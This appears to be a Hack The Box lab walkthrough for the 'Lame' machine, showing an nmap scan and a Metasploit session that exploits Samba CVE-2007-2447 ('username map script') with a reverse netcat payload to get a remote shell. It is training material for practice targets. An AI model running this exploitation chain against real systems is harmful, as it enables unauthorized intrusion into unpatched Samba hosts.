4/30/2022

HTB: Lame

 ___  ___  _________  ________                   
|\  \|\  \|\___   ___\\   __  \  ___             
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\            
 \ \   __  \   \ \  \ \ \   __  \|__|            
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___          
   \ \__\ \__\   \ \__\ \ \_______\|\__\         
    \|__|\|__|    \|__|  \|_______|\|__|         
 ___       ________  _____ ______   _______      
|\  \     |\   __  \|\   _ \  _   \|\  ___ \     
\ \  \    \ \  \|\  \ \  \\\__\ \  \ \   __/|    
 \ \  \    \ \   __  \ \  \\|__| \  \ \  \_|/__  
  \ \  \____\ \  \ \  \ \  \    \ \  \ \  \_|\ \ 
   \ \_______\ \__\ \__\ \__\    \ \__\ \_______\
    \|_______|\|__|\|__|\|__|     \|__|\|_______| 

Hack The Box's Lame is an Easy machine that features the CVE-2007-2447 vulnerability which was first disclosed in 2007 and effected Samba 3.0.0 through 3.0.25rc3. You can learn more about this vulnerability's CVE details here.

Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine. 

ping 10.129.136.4

You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.

Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here. Note: I had to use the -Pn flag to skip host discovery in order to get proper scan results. You should receive the following output in your terminal:

nmap -sV -Pn 10.129.136.4
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-30 22:52 BST
Nmap scan report for 10.129.136.4
Host is up (0.015s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.58 seconds

On port 21 we can see that Vsftpd 2.3.4 is running. This is usually exploitable through a built-in backdoor, however it is not exploitable on this machine. Let's look at the Samba smdb service running on port 139. After doing some research, we find this service can be exploited using the "username map script" configuration option to run commands!

Open Metasploit in a new terminal by typing "msfconsole".

msfconsole
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v6.1.9-dev                           ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Save the current environment with the 
save command, future console restarts will use this 
environment again

msf6 > 

Let's search for Samba exploits using the "search" option.

search samba 3.0

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script         2007-05-14       excellent  No     Samba "username map script" Command Execution
   1  exploit/linux/samba/chain_reply            2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   2  exploit/linux/samba/lsa_transnames_heap    2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   3  exploit/osx/samba/lsa_transnames_heap      2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   4  exploit/solaris/samba/lsa_transnames_heap  2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow


Interact with a module by name or index. For example info 4, use 4 or use exploit/solaris/samba/lsa_transnames_heap

The exploit we are looking to use is the first one, exploit/multi/samba/usermap_script. To use an exploit we can type "use" and then the exploits assigned index # value from the search results.

Once the exploit has loaded, type "options" and hit Enter. This will bring up the exploits options which we will need to configure.

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/
                                      Using-Metasploit
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  147.182.150.190  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(multi/samba/usermap_script) > 

Our RPORT is preconfigured to the correct port but our RHOSTS option is blank and is required to run the exploit. To set this we will need to type "set RHOSTS" then the IP of our target machine and hit Enter. We will see a confirmation line with the set RHOSTS IP.

msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.129.136.4
RHOSTS => 10.129.136.4
msf6 exploit(multi/samba/usermap_script) > 

You may need to change your Payload options LHOST and LPORT if you are using a VPN, Virtual Machine, or HTB PWNBOX. Most of the time, this can be done just by entering "set LHOST" followed by your interface, usually "tun0". With everything all set, it's time to run the exploit! Type "run" then hit Enter.

msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.75:4444 
[*] Command shell session 1 opened (10.10.14.75:4444 -> 10.129.136.4:34959) at 2022-04-30 23:20:35 +0100

Looks like we got a command shell session! Let's type "shell" to get an interactive shell.

shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash

You can now navigate through the target system to obtain the root and user .txt flags using Linux commands.